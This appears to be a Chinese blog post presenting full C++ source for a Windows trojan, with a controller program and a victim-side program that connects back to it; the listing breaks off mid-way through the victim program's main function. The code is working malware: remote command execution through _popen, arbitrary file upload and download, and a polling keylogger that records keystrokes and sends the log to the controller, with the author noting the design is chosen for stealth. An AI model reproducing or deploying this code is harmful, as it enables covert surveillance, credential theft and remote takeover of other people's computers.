【网络编程】Trojan源码 文件传输+远程cmd+键盘记录

该 Trojan 实现了三个功能:文件传输、远程执行 cmd 和键盘记录。其中键盘记录功能没有使用 hook 函数,而是通过 GetAsyncKeyState 轮询按键状态,作者认为这样隐蔽性较强;不过这种高频轮询按键状态的调用本身也是基于行为的检测常用的识别特征。

现在给出源码:


client(控制端:监听 2345 端口,等待受控主机连入):

// client.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"  
#include <winsock2.h>  
#include <cstdio>
#include <wincrypt.h>
#include <cstring>
#include <iostream>  
#include <string.h> 
#include<vector>
#include<time.h>
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")   
#pragma comment(lib, "crypt32.lib")  

using namespace std;
// Controller-side globals. mac_mine and ip_mine are not referenced anywhere else in this listing.
unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 };		// author's MAC address 40-E2-30-68-43-A9
unsigned char ip_mine[16] = {"127.0.0.1" };						// author's IP 172.20.10.5 (the initializer itself is loopback)
int num;	// number of connected hosts; entries are stored in host[1..num]
struct node
{
	sockaddr_in addrClient;	// peer address filled in by accept()
	SOCKET socketClient;	// connected socket for that peer
}host[1024];

// Accept loop: registers every newly connected host in host[].
// lpParameter carries the listening SOCKET cast to LPVOID (see the CreateThread call in _tmain).
// The loop has no exit, so the function never returns.
DWORD WINAPI ClientThread(LPVOID lpParameter)
{
	int len = sizeof(SOCKADDR);
	SOCKET socketClient;
	sockaddr_in addrClient;
	int id = 0;	// not used below
	SOCKET socketSever = (SOCKET)lpParameter;
	while (true)
	{
		// Blocks until a host connects; the returned socket is stored without an INVALID_SOCKET check.
		socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);
		// num and host[] are also read and written by the menu thread (refresh/HostClear/RemoveHost);
		// no lock is taken here and num is not compared with the 1024-entry array size.
		num++;
		host[num].addrClient=addrClient;
		host[num].socketClient = socketClient;
	}
}

// Remove the entry of a disconnected host by shifting every later entry down one slot.
// id: 1-based index into host[] of the entry to drop.
void RemoveHost(int id)
{
	for (int i = id; i < num; i++)
	{
		host[i] = host[i + 1];
	}
	num--;
}
// Probe every registered host and drop the ones whose connection has failed.
// The probe is a 4-byte integer 0 written to the socket; the peer's command loop (server _tmain)
// acts only on the values 1-4, so a 0 is read there and ignored.
void HostClear()
{
	// Iterating from the end means RemoveHost's shift only moves entries that were already probed.
	for (int i = num; i >=1; i--)
	{
		int sendbuf = 0;
		int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);
		if (Result == SOCKET_ERROR)
		{
			RemoveHost(i);
		}
	}
}
// Refresh: prune dead connections, then print the host count and each host's address.
void refresh()
{
	HostClear();
	cout << "受控主机数:" << num << endl;
	for (int i = 1; i <= num; i++)
	{
		// sin_port is printed exactly as stored by accept(); no ntohs() is applied.
		cout << i << ".   ip:" << inet_ntoa(host[i].addrClient.sin_addr) << "   port:" << host[i].addrClient.sin_port << endl;
	}
}

// Receive exactly fixedlen bytes from s into recvbuf, looping over short reads.
// Returns fixedlen on success, -1 if recv() fails (the WSA error code is printed),
// or the number of bytes received so far if the peer closes the connection first.
int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
	int iResult;
	int cnt = fixedlen; // bytes still to be received
	while (cnt > 0)
	{
		iResult = recv(s, recvbuf, cnt, 0);
		if (iResult < 0)
		{
			printf("error: %d\n", WSAGetLastError());
			return -1;
		}
		if (iResult == 0)// peer closed the connection: return the byte count received so far (less than fixedlen)
			return fixedlen - cnt;
		recvbuf += iResult;	// advance past the bytes just received
		cnt -= iResult;
	}
	return fixedlen;
}
// Remote command session, controller side.
// Each round reads one console line, sends it as a fixed BUFFER_SIZE-byte frame, then waits for a
// fixed BUFFER_SIZE*64-byte reply and prints it. A line starting with "exit" is still sent and then
// ends the session. No encryption or authentication is applied to this traffic in this listing.
// id: index into host[] of the connection to use.
void UseCmd(int id)
{
	SOCKET s = host[id].socketClient;
	char	buf[BUFFER_SIZE];
	char result[BUFFER_SIZE * 64];
	int  inputlen;	// not used below
	getchar();	// presumably consumes the newline left behind by the earlier "cin >> id"
	while (1)
	{
		memset(buf, 0, sizeof(buf));
		memset(result, 0, sizeof(result));
		cout << "C:\\Socket\\Client>";	// fixed prompt text, not the remote working directory
		cin.getline(buf, sizeof(buf)); 
		send(s, buf, BUFFER_SIZE, 0);	// the whole zero-padded buffer is sent, not just the typed text
		if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't')
		{
			cout << "The End." << endl;
			return ;
		}
		
		recvn(s, result, sizeof(result));
		// NOTE(review): the bytes received from the remote host are passed as the printf format string.
		printf(result);
	}
}



// Fetch a file from the remote host, controller side.
// Sends the file name as a BUFFER_SIZE-byte frame, creates a local file with the same name,
// reads a 4-byte network-order length, then receives that many bytes in chunks of at most
// BUFFER_SIZE and writes them to the local file.
// id: index into host[] of the connection to use.
void GetFile(int id)
{
	SOCKET s = host[id].socketClient;
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	cout << "输入文件名:";
	getchar();	// presumably consumes the newline left behind by the earlier "cin >> id"
	cin.getline(filename, sizeof(filename));
	send(s, filename, sizeof(filename), 0); 
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	// Copy the name one char per TCHAR slot (no code-page conversion is performed).
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // file name
		GENERIC_WRITE,          // write access
		0,                      // no sharing: other processes cannot open the file meanwhile
		NULL,                   // handle is not inheritable by child processes
		CREATE_ALWAYS,             // always create the file, overwriting an existing one
		FILE_ATTRIBUTE_NORMAL,  // normal file
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);	// the length prefix arrives in network byte order
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	while (filelen > 0)
	{
		cout << filelen << endl;	// progress output: bytes still expected
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen=recvn(s, recvbuf, recvbuflen);
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen); 
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;

}

// Push a local file to the remote host, controller side.
// Sends the file name as a BUFFER_SIZE-byte frame, then the file size as a 4-byte network-order
// integer, then the file contents as they are read from disk.
// id: index into host[] of the connection to use.
void SendFile(int id)
{
	SOCKET  s = host[id].socketClient;
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	cout << "输入文件名:";
	getchar();	// presumably consumes the newline left behind by the earlier "cin >> id"
	cin.getline(filename, sizeof(filename));
	send(s, filename, BUFFER_SIZE, 0);
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	// Copy the name one char per TCHAR slot (no code-page conversion is performed).
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);	// low 32 bits of the size only
	unsigned int filelen1 = htonl(filelen);	// length prefix goes out in network byte order
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE*32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;	// progress output: bytes still to send
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);	// reads 1024 bytes per round although buf is larger
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0);
	}
	CloseHandle(hFile);
	cout << "文件传输成功!" << endl;
}

// Request a timed key-capture run from the remote host and store the returned log, controller side.
// Sends the duration as a raw 4-byte int (host byte order), then receives a length-prefixed
// byte stream and writes it to "KeyLogger.txt" in the current directory.
// The peer in this listing runs Time*125 polling rounds with an 8 ms sleep each, i.e. roughly
// Time seconds, before it answers, so this call blocks for at least that long.
// id: index into host[] of the connection to use.
void KeyLogger(int id)
{
	SOCKET  s = host[id].socketClient;
	cout << "请输入记录时长:";
	int Time;
	cin >> Time;
	send(s, (char*)&Time, sizeof(int), 0);
	char filename[BUFFER_SIZE] = "KeyLogger.txt";
	TCHAR name[BUFFER_SIZE];
	// Copy the whole zero-padded name buffer, one char per TCHAR slot.
	for (int i = 0;i<BUFFER_SIZE; i++)
		name[i] = filename[i];
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // file name
		GENERIC_WRITE,          // write access
		0,                      // no sharing: other processes cannot open the file meanwhile
		NULL,                   // handle is not inheritable by child processes
		CREATE_ALWAYS,             // always create the file, overwriting an existing one
		FILE_ATTRIBUTE_NORMAL,  // normal file
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);	// the length prefix arrives in network byte order
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	cout << endl;
	while (filelen > 0)
	{
		cout << filelen << " ";	// progress output: bytes still expected
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen = recvn(s, recvbuf, recvbuflen);
		cout << recvlen << endl;	// progress output: bytes received this round
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen);
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;
}

// Controller entry point.
// Initialises Winsock, listens on TCP port PORT (2345) on all interfaces, starts ClientThread to
// accept incoming hosts, then runs an interactive menu. For every choice other than 0 the chosen
// number is sent to the selected host as a raw 4-byte int before the matching handler runs.
// Returns 0 on every start-up failure path; the menu loop itself never exits.
int _tmain(int argc, _TCHAR* argv[])
{
	WORD sockVersion = MAKEWORD(2, 2);
	WSADATA wsaData;
	int error = WSAStartup(sockVersion, &wsaData);
	if (error != 0)
	{
		cout << "fail to startup! " << WSAGetLastError() << endl;
		return 0;
	}
	SOCKET socketSever = socket(AF_INET, SOCK_STREAM, 0);
	if (socketSever == INVALID_SOCKET)
	{
		cout << "socket error! " << WSAGetLastError() << endl;
		WSACleanup();
		closesocket(socketSever);
		return 0;
	}

	// local socket address: every interface (INADDR_ANY), port PORT
	sockaddr_in addrServer;
	addrServer.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
	addrServer.sin_family = AF_INET;
	addrServer.sin_port = htons(PORT);
	// bind the socket to the local port
	if (bind(socketSever, (SOCKADDR*)&addrServer, sizeof(SOCKADDR)) == SOCKET_ERROR)
	{
		cout << "bind error! " << WSAGetLastError() << endl;;
		closesocket(socketSever);
		WSACleanup();
		return 0;
	}
	// A listen() failure is only reported; execution continues.
	if (listen(socketSever, 10) == SOCKET_ERROR)
		cout << "Listen failed with error " << WSAGetLastError() << endl;

	num = 0;

	// Accept connections in the background while this thread runs the menu.
	HANDLE hThread = NULL;
	hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)socketSever, 0, NULL);
	
	refresh();
	while (1)
	{
		cout << "请选择操作" << endl;

		cout << "---------------------------------------------------"<<endl;
		cout << "|                    请输入选项                   |" << endl;
		cout << "|                    0.刷新主机                   |" << endl;
		cout << "|                    1.获取文件                   |" << endl;
		cout << "|                    2.发送文件                   |" << endl;
		cout << "|                    3.远程控制                   |" << endl;
		cout << "|                    4.键盘记录                   |" << endl;
		cout << "---------------------------------------------------" << endl;

		int choice;
		cin >> choice;
		if (choice == 0)
		{
			refresh();
		}
		else
		{
			cout << "选择受控主机编号: ";
			int id;
			cin >> id;
			// id is used as an index into host[] exactly as typed; the opcode is sent in host byte order.
			send(host[id].socketClient, (char*)&choice, sizeof(int), 0);
			if (choice == 1)
			{
				GetFile(id);
			}
			if (choice == 2)
			{
				SendFile(id);
			}
			if (choice == 3)
			{
				UseCmd(id);
			}
			if (choice == 4)
			{
				KeyLogger(id);
			}
		}
	}
	// Not reached: the loop above has no break.
	CloseHandle(hThread);
	closesocket(socketSever);
	return 0;
}


server(受控端:主动连接控制端的 2345 端口,并执行收到的指令):

// server.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"  
#include <winsock2.h>  
#include <cstdio>
#include <wincrypt.h>
#include <time.h>
#include <cstring>
#include <iostream>  
#include <string.h> 
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")   
#pragma comment(lib, "crypt32.lib")  

using namespace std;

// Address of the controller this program connects to (loopback in this listing); used by _tmain.
char IP[16] = { "127.0.0.1" };
// Text recorded for each polled key in its unshifted form; entry i pairs with SpecialKeys[i].
// The first two entries are placeholders for Backspace (8) and Enter (13), which KeyLogger
// handles itself before it reaches a table lookup.
char *LowerCase[] = {
	"b",
	"e",
	"[ESC]",
	"[F1]",
	"[F2]",
	"[F3]",
	"[F4]",
	"[F5]",
	"[F6]",
	"[F7]",
	"[F8]",
	"[F9]",
	"[F10]",
	"[F11]",
	"[F12]",
	"`",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	"0",
	"-",
	"=",
	"[TAB]",
	"q",
	"w",
	"e",
	"r",
	"t",
	"y",
	"u",
	"i",
	"o",
	"p",
	"[",
	"]",
	"a",
	"s",
	"d",
	"f",
	"g",
	"h",
	"j",
	"k",
	"l",
	";",
	"'",
	"z",
	"x",
	"c",
	"v",
	"b",
	"n",
	"m",
	",",
	".",
	"/",
	"\\",
	"[CTRL]",
	"[WIN]",
	" ",
	"[WIN]",
	"[Print Screen]",
	"[Scroll Lock]",
	"[Insert]",
	"[Home]",
	"[PageUp]",
	"[Del]",
	"[End]",
	"[PageDown]",
	"[Left]",
	"[UP]",
	"[Right]",
	"[Down]",
	"[Num Lock]",
	"/",
	"*",
	"-",
	"+",
	"0",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	".",
};
// Text recorded for each polled key in its shifted / upper-case form; entry i pairs with
// SpecialKeys[i]. Non-printing keys carry the same bracketed labels as in LowerCase.
char *UpperCase[] = {
	"b",
	"e",
	"[ESC]",
	"[F1]",
	"[F2]",
	"[F3]",
	"[F4]",
	"[F5]",
	"[F6]",
	"[F7]",
	"[F8]",
	"[F9]",
	"[F10]",
	"[F11]",
	"[F12]",
	"~",
	"!",
	"@",
	"#",
	"$",
	"%",
	"^",
	"&",
	"*",
	"(",
	")",
	"_",
	"+",
	"[TAB]",
	"Q",
	"W",
	"E",
	"R",
	"T",
	"Y",
	"U",
	"I",
	"O",
	"P",
	"{",
	"}",
	"A",
	"S",
	"D",
	"F",
	"G",
	"H",
	"J",
	"K",
	"L",
	":",
	"\"",
	"Z",
	"X",
	"C",
	"V",
	"B",
	"N",
	"M",
	"<",
	">",
	".?",
	"│",
	"[CTRL]",
	"[WIN]",
	" ",
	"[WIN]",
	"[Print Screen]",
	"[Scroll Lock]",
	"[Insert]",
	"[Home]",
	"[PageUp]",
	"[Del]",
	"[End]",
	"[PageDown]",
	"[Left]",
	"[Up]",
	"[Right]",
	"[Down]",
	"[Num Lock]",
	"/",

	"*",
	"-",
	"+",
	"0",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	".",
};
// Key codes passed to GetAsyncKeyState by KeyLogger, in the same order as LowerCase/UpperCase.
// These are Windows virtual-key codes rather than ASCII values (e.g. 8 = Backspace, 13 = Enter,
// 27 = Esc, 112-123 = F1-F12).
int SpecialKeys[] = {
	8,
	13,
	27,
	112,
	113,
	114,
	115,
	116,
	117,
	118,
	119,
	120,
	121,
	122,
	123,
	192,
	49,
	50,
	51,
	52,
	53,
	54,
	55,
	56,
	57,
	48,
	189,
	187,
	9,
	81,
	87,
	69,
	82,
	84,
	89,
	85,
	73,
	79,
	80,
	219,
	221,
	65,
	83,
	68,
	70,
	71,
	72,
	74,
	75,
	76,
	186,
	222,
	90,
	88,
	67,
	86,
	66,
	78,
	77,
	188,
	190,
	191,
	220,
	17,
	91,
	32,
	92,
	44,
	145,
	45,
	36,
	33,
	46,
	35,
	34,
	37,
	38,
	39,
	40,
	144,
	111,
	106,
	109,
	107,
	96,
	97,
	98,
	99,
	100,
	101,
	102,
	103,
	104,
	105,
	110,
};
// Foreground window seen on the previous IsWindowsFocusChange() call; NULL until the first call.
HWND PreviousFocus = NULL;

// Receive exactly fixedlen bytes from s into recvbuf, looping over short reads.
// Returns fixedlen on success, -1 if recv() fails (the WSA error code is printed),
// or the number of bytes received so far if the peer closes the connection first.
int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
	int iResult;
	int cnt = fixedlen; // bytes still to be received
	while (cnt > 0)
	{
		iResult = recv(s, recvbuf, cnt, 0);
		if (iResult < 0)
		{
			printf("error: %d\n", WSAGetLastError());
			return -1;
		}
		if (iResult == 0)// peer closed the connection: return the byte count received so far (less than fixedlen)
			return fixedlen - cnt;
		recvbuf += iResult;	// advance past the bytes just received
		cnt -= iResult;
	}
	return fixedlen;
}

// Handler for opcode 1: send a local file to the controller.
// Receives a BUFFER_SIZE-byte file-name frame, prints the name, opens that path for reading,
// sends the size as a 4-byte network-order integer and then the contents as read from disk.
// The path is used exactly as received from the network peer.
// s: connected socket to the controller.
void SendFile(SOCKET s)
{
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	recvn(s, filename, BUFFER_SIZE); cout << filename << endl;
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	// Copy the name one char per TCHAR slot (no code-page conversion is performed).
	for (int i = 0; filename[i]; i++)
		name[i] = filename[i];
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);	// low 32 bits of the size only
	unsigned int filelen1 = htonl(filelen);	// length prefix goes out in network byte order
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE * 32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;	// progress output: bytes still to send
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);	// reads 1024 bytes per round although buf is larger
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0); 
	}
	CloseHandle(hFile);
}

// Handler for opcode 2: receive a file from the controller and write it to local disk.
// Receives a BUFFER_SIZE-byte file-name frame, creates (or overwrites) that path, reads a 4-byte
// network-order length, then receives that many bytes in chunks of at most BUFFER_SIZE.
// The path is used exactly as received from the network peer.
// s: connected socket to the controller.
void GetFile(SOCKET s)
{
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	recvn(s, filename, BUFFER_SIZE);
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	// Copy the name one char per TCHAR slot (no code-page conversion is performed).
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // file name
		GENERIC_WRITE,          // write access
		0,                      // no sharing: other processes cannot open the file meanwhile
		NULL,                   // handle is not inheritable by child processes
		CREATE_ALWAYS,             // always create the file, overwriting an existing one
		FILE_ATTRIBUTE_NORMAL,  // normal file
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);	// the length prefix arrives in network byte order
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	while (filelen > 0)
	{
		cout << filelen << endl;	// progress output: bytes still expected
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen = recvn(s, recvbuf, recvbuflen);
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen);
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;

}

// Run cmd through _popen and append everything it writes to standard output onto result.
// cmd:    command line, passed to _popen unchanged.
// result: caller's buffer; must already hold a NUL-terminated string, because output is
//         appended with strcat. No length limit is applied in this function.
// Returns 0 if the pipe could not be opened, 1 otherwise.
// _popen starts the command through the system command interpreter, so every command shows up
// as a child process of this program.
int execmd(char* cmd, char* result) {
	char buffer[BUFFER_SIZE];                         // line buffer for the pipe output
	FILE* pipe = _popen(cmd, "r");            // open a read pipe and run the command
	if (!pipe)
		return 0;                      // 0 means the command could not be started
	
	while (!feof(pipe)) {
		if (fgets(buffer, BUFFER_SIZE, pipe)){             // append each chunk of pipe output to result
			strcat(result, buffer);
		}
	}
	_pclose(pipe);                            // close the pipe
	return 1;                                 // 1 means the command was run
}


// Handler for opcode 3: command session.
// Each round receives a BUFFER_SIZE-byte command frame, runs it with execmd and sends back the
// whole BUFFER_SIZE*64-byte result buffer (zero-padded). A frame starting with "exit" ends the
// session without a reply. Commands are executed exactly as received from the network peer.
// s: connected socket to the controller.
void UseCmd(SOCKET s)
{
	char buf[BUFFER_SIZE];
	char result[BUFFER_SIZE * 64]; 
	while (1)
	{
		memset(buf, 0, sizeof(buf));
		memset(result, 0, sizeof(result));
		recvn(s, buf, BUFFER_SIZE); 
		if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't')
		{
			return;
		}
		execmd(buf, result); 
		send(s, result, sizeof(result),0);	// always sends the full fixed-size buffer
	}
	
}
// Process-lifetime buffer for the foreground window's caption (102 bytes, never freed).
char *WindowCaption = (char*)malloc(sizeof(char)* (100 + 2)); // Allocate Memory For The Caption
// Report whether the foreground window differs from the one seen on the previous call.
// Updates PreviousFocus and fetches the new window's caption into WindowCaption.
// Returns TRUE only when the window changed and strlen() of the fetched caption is non-zero.
BOOL IsWindowsFocusChange()
{
	HWND hFocus = GetForegroundWindow(); // Retrieve The Active Window
	BOOL ReturnFlag = FALSE; // Declare The Return Flag
	if (hFocus != PreviousFocus) // The Active Window Has Changed
	{
		PreviousFocus = hFocus; // Remember The New Active Window For The Next Call
		int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
		memset(WindowCaption, 0, sizeof(WindowCaption));
		//char *WindowCaption = (char*)malloc(sizeof(char)* (WinLeng + 2)); // Allocate Memory For The Caption
		//char WindowCaption[52];
		GetWindowText(hFocus, (LPWSTR)WindowCaption, (WinLeng + 1)); // Retrieve The Active Windows's Caption
		if (WindowCaption != NULL&&strlen(WindowCaption) > 0) // Really Get The Windows's Caption
		{
			//printf("rnThe Active Windows Title: %srn", WindowCaption); // Display The Active Windows's Caption
			ReturnFlag = TRUE; // Indicate The Windows's Focus Has Changed
		}
		//free(WindowCaption); // Free The Allocated Memory
	} 
	return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function
//-------------------------------------------------------------------------
// Purpose: Poll key state for a bounded time and write the captured text to "out.txt"
// Return Type: Boolean (always TRUE)
// Parameters: Time - duration; the loop runs Time*125 rounds with an 8 ms sleep each,
//             i.e. roughly Time seconds
// Observable behaviour: every round calls GetAsyncKeyState for 92 key codes and
// GetForegroundWindow once; "out.txt" is created (overwritten) in the current
// directory and held open without sharing until the function returns.
//-------------------------------------------------------------------------
BOOL KeyLogger(int Time)
{
	Time *= 125;
	int bKstate[256] = { 0 }; // Per-key pending state, indexed by key code (0 = nothing pending)
	int i, x;
	char KeyBuffer[600]; // Key Buffer Array
	int state; // Holds The Pending State Of The Key Being Released
	int shift; // Holds The State Of The Shift Key
	// Reset The Buffer
	memset(KeyBuffer, 0, sizeof(KeyBuffer));
	char filename[1024] = { "out.txt" };
	TCHAR name[1024];
	// Copy the whole zero-padded name buffer, one char per TCHAR slot.
	for (int i = 0; i < 1024; i++)
		name[i] = filename[i];
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // file name
		GENERIC_WRITE,          // write access
		0,                      // no sharing: other processes cannot open the file meanwhile
		NULL,                   // handle is not inheritable by child processes
		CREATE_ALWAYS,             // always create the file, overwriting an existing one
		FILE_ATTRIBUTE_NORMAL,  // normal file
		NULL
		);
	DWORD cnt;

	while (Time--) // Bounded Loop: Runs For The Number Of Rounds Computed Above
	{
		Sleep(8); // Pause Between Polling Rounds So The Loop Does Not Spin At Full CPU
		if (IsWindowsFocusChange()) //Check The Active Windows Title
		{
			if (strlen(KeyBuffer) != 0) // Keys Are Pressed
			{
				//printf("%s", KeyBuffer); // Display The Keys Pressed
				WriteFile(hFile, KeyBuffer, 600, &cnt, 0); // Writes The Whole 600-Byte Buffer, Zero Padding Included
				memset(KeyBuffer, 0, sizeof(KeyBuffer)); // reset The Buffer
			}
		}
		for (i = 0; i<92; i++) // Looping To Check Visual Keys
		{
			shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
			x = SpecialKeys[i]; // Match The Key
			if (GetAsyncKeyState(x) & 0x8000) // Key Is Currently Down: Remember Which Case Applies
			{
				// See Whether CapsLocak Or Shift Is Pressed
				if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed

				{
					bKstate[x] = 1; //Uppercase Characters A-Z
				}
				else
				if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
				{
					bKstate[x] = 2; //Lowercase a-z
				}
				else
				if (shift < 0) // Shift Is Pressed
				{
					bKstate[x] = 3; //Uppercase Characters A-Z
				}
				else
					bKstate[x] = 4; //Lowercase a-z
			}
			else
			{
				if (bKstate[x] != 0) // Key Was Down Earlier And Is Now Released
				{
					state = bKstate[x]; // Retrieve The Current State
					bKstate[x] = 0; // Reset The Current State
					if (x == 8) // Back Space Is Detected
					{
						KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
						continue; // Start A New Loop
					}
					else
					if (strlen(KeyBuffer) > 550) // Buffer FULL
					{
						//printf("%s <Buffer Full>", KeyBuffer); // Display The Keys Retrieved
						WriteFile(hFile, KeyBuffer, 600, &cnt, 0);
						memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Reset The Buffer
						continue; // Start A New Loop
					}
					else
					if (x == 13) // Enter Is Detected
					{
						if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
						{
							continue; // Start A New Loop
						}
						//printf("%s<Enter>", KeyBuffer); // Retrieve Other Keys With Enter
						WriteFile(hFile, KeyBuffer, 600, &cnt, 0);
						memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Reset The Buffer After Flushing On Enter
						continue; // Start A New Loop
					}
					else
					if ((state % 2) == 1) // States 1 And 3: Use The UpperCase Table
					{
						strcat(KeyBuffer, UpperCase[i]); // Store The Key To Key Buffer
					}
					else
					if ((state % 2) == 0) // States 2 And 4: Use The LowerCase Table
					{
						strcat(KeyBuffer, LowerCase[i]); // Store The Key To Key Buffer
					}
				}
			}
		}// End Of For Loop
	}// End Of While Loop
	CloseHandle(hFile);
	return TRUE; // Return To The Caller
}// End Of KeyLogger Function
// End Of File

// Handler for opcode 4: timed key capture.
// Reads the duration as a raw 4-byte int with a single recv() call, runs KeyLogger for that
// duration, then sends "out.txt" back: 4-byte network-order length followed by the contents.
// s: connected socket to the controller.
void UseKeyLogger(SOCKET s)
{
	int Time;
	recv(s, (char*)&Time, sizeof(int), 0);
	KeyLogger(Time);	// blocks until the capture run is over
	char filename[BUFFER_SIZE] = "out.txt";
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	// Copy the name one char per TCHAR slot.
	for (int i = 0; filename[i]; i++)
		name[i] = filename[i];
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);	// low 32 bits of the size only
	unsigned int filelen1 = htonl(filelen);	// length prefix goes out in network byte order
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE * 32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;	// progress output: bytes still to send
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);	// reads 1024 bytes per round although buf is larger
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0);
	}
	CloseHandle(hFile);
}

// Entry point of the controlled-host program.
// Initialises Winsock, makes one outbound TCP connection to IP:PORT (127.0.0.1:2345 in this
// listing) and then loops forever reading 4-byte opcodes from the controller:
//   1 -> SendFile, 2 -> GetFile, 3 -> UseCmd, 4 -> UseKeyLogger; any other value is ignored.
// Returns -1 if Winsock start-up or socket creation fails.
int _tmain(int argc, _TCHAR* argv[])
{
	WORD sockVersion = MAKEWORD(2, 2);
	WSADATA wsaData;
	int error = WSAStartup(sockVersion, &wsaData);
	if (error)
	{
		cout << "fail to startup" << GetLastError() << endl;
		WSACleanup();
		return -1;
	}
